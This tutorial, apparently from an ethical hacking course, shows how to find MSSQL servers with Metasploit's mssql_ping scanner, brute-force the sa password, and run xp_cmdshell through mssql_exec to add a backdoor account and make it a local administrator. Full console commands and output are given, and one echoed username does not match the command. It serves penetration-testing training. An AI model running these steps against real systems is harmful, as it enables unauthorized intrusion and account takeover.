Metasploit: Hunting for MSSQL

Advanced Ethical Hacking Institute in Pune

Using Metasploit to find MSSQL vulnerable systems

Searching and locating MSSQL installations inside the internal network can be achieved using UDP foot-printing. When MSSQL installs, it installs either on port 1433 TCP or a randomized dynamic TCP port. If the port is dynamically attributed, querying UDP port 1434 will provide us with information on the server including the TCP port on which the service is listening.

Let us search and load the MSSQL ping module inside the msfconsole.

msf > search mssql

Exploits
========

   Name                                       Description
   ----                                       -----------
   windows/mssql/lyris_listmanager_weak_pass  Lyris ListManager MSDE Weak sa Password
   windows/mssql/ms02_039_slammer             Microsoft SQL Server Resolution Overflow
   windows/mssql/ms02_056_hello               Microsoft SQL Server Hello Overflow
   windows/mssql/mssql_payload                Microsoft SQL Server Payload Execution


Auxiliary
=========

   Name                       Description
   ----                       -----------
   admin/mssql/mssql_enum     Microsoft SQL Server Configuration Enumerator
   admin/mssql/mssql_exec     Microsoft SQL Server xp_cmdshell Command Execution
   admin/mssql/mssql_sql      Microsoft SQL Server Generic Query
   scanner/mssql/mssql_login  MSSQL Login Utility
   scanner/mssql/mssql_ping   MSSQL Ping Utility

msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > show options

Module options (auxiliary/scanner/mssql/mssql_ping):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target address range or CIDR identifier
   THREADS              1                yes       The number of concurrent threads
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification

msf auxiliary(mssql_ping) > set RHOSTS 10.211.55.1/24
RHOSTS => 10.211.55.1/24
msf auxiliary(mssql_ping) > exploit

[*] SQL Server information for 10.211.55.128:
[*] tcp = 1433
[*] np = SSHACKTHISBOX-0pipesqlquery
[*] Version = 8.00.194
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = SSHACKTHISBOX-0
[*] Auxiliary module execution completed

The first command we issued was to search for any ‘mssql‘ plugins. The second set of instructions was the ‘use scanner/mssql/mssql_ping‘, this will load the scanner module for us.

Next, ‘show options‘ allows us to see what we need to specify. The ‘set RHOSTS 10.211.55.1/24′ sets the subnet range we want to start looking for SQL servers on. You could specify a /16 or whatever you want to go after. We would recommend increasing the number of threads as this could take a long time with a single threaded scanner.

After the ‘run‘ command is issued, a scan is going to be performed and pull back specific information about the MSSQL server. As we can see, the name of the machine is “SSHACKTHISBOX-0″ and the TCP port is running on 1433.

At this point you could use the ‘scanner/mssql/mssql_login‘ module to brute-force the password by passing the module a dictionary file. Alternatively, you could also use Fast-Track, medusa, or hydra to do this. Once you successfully guess the password, there’s a neat little module for executing the xp_cmdshell stored procedure.

msf auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_exec
msf auxiliary(mssql_exec) > show options

Module options (auxiliary/admin/mssql/mssql_exec):

   Name                 Current Setting                       Required  Description
   ----                 ---------------                       --------  -----------
   CMD                  cmd.exe /c echo OWNED > C:\owned.exe  no        Command to execute
   PASSWORD                                                   no        The password for the specified username
   RHOST                                                      yes       The target address
   RPORT                1433                                  yes       The target port
   USERNAME             sa                                    no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false                                 yes       Use windows authentification


msf auxiliary(mssql_exec) > set RHOST 10.211.55.128
RHOST => 10.211.55.128
msf auxiliary(mssql_exec) > set MSSQL_PASS password
MSSQL_PASS => password
msf auxiliary(mssql_exec) > set CMD net user bacon ihazpassword /ADD
cmd => net user rel1k ihazpassword /ADD
msf auxiliary(mssql_exec) > exploit

The command completed successfully.

[*] Auxiliary module execution completed

Looking at the output of the ‘net user bacon ihazpassword /ADD’, we have successfully added a user account named “bacon”, from there we could issue ‘net localgroup administrators bacon /ADD’ to get a local administrator on the system itself. We have full control over the system at this point.